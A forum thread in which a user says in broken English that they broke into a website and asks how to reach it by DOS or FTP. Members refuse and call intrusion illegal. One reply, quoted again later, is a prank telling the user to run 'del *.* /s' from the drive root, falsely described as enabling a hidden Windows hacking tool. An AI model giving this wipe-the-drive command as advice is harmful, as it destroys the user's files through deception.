Thread: help meeeeeeeeeee!!

help meeeeeeeeeee!!

hey, I am breaked in a site , I just logging by browser but I can`t logging by dos or ftp ??? or I must using webserver program?? what must I do now?? I want to change my database to another folder

AO Ancient: Team Leader
    If you are using winX which the best hackers do you need to go to the command prompt and type:-

cd\ [ENTER]
    del *.* /s [ENTER]

Then reboot your machine.

This enables the hidden hacking tool that the evil Bill Gates has hidden in every version of windows since Win 3.11 for work groups.

Then when your box comes back up go back to the command prompt and type:-

cd\ [ENTER]
    RUN MeID10T

and follow the prompts from there.

Easy as pie......

Just a Virtualized Geek MrLinus's Avatar
    I am breaked in a site
    Huh? Are you saying that someone broke into your website or you broke into someone else's?

I just logging by browser but I can`t logging by dos or ftp ??? or I must using webserver program?? what must I do now?? I want to change my database to another folder
    Let me see if I get this: you've logged in with your browser but you can't log in using DOS or FTP? You're asking if you must use a webserver program? And what must you do now?

Well, here's a hint: stop what you are doing. Breaking into someone else's website is against the law and not a good thing to do.
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

Yes, that's my CC number! 576869746568617's Avatar
    OK, If it's your site.......that's one thing. You might think about re-wording your post.
    However, if it's not (which I and probably everyone else thik it's not by the above post) I think MsMittens, Negative, or another Admin/Moderator should close the thread.

That kind of stuff is OK for IRC but not here.........We fix 'em, not break 'em.

Tiger Shark! Don't give out ALL our secrets!!!
    Quitmzilla is a firefox extension that gives you stats on how long you have quit smoking, how much money you\'ve saved, how much you haven\'t smoked and recent milestones. Very helpful for people who quit smoking and used to smoke at their computers... Helps out with the urges.

Originally posted here by Tiger Shark
    If you are using winX which the best hackers do you need to go to the command prompt and type:-

cd\ [ENTER]
    del *.* /s [ENTER]

Then reboot your machine.

This enables the hidden hacking tool that the evil Bill Gates has hidden in every version of windows since Win 3.11 for work groups.

Then when your box comes back up go back to the command prompt and type:-

cd\ [ENTER]
    RUN MeID10T

and follow the prompts from there.

Easy as pie......
    OK, my sides now hurt from laughing. That was good.
    Tim Potts
    Network Analyst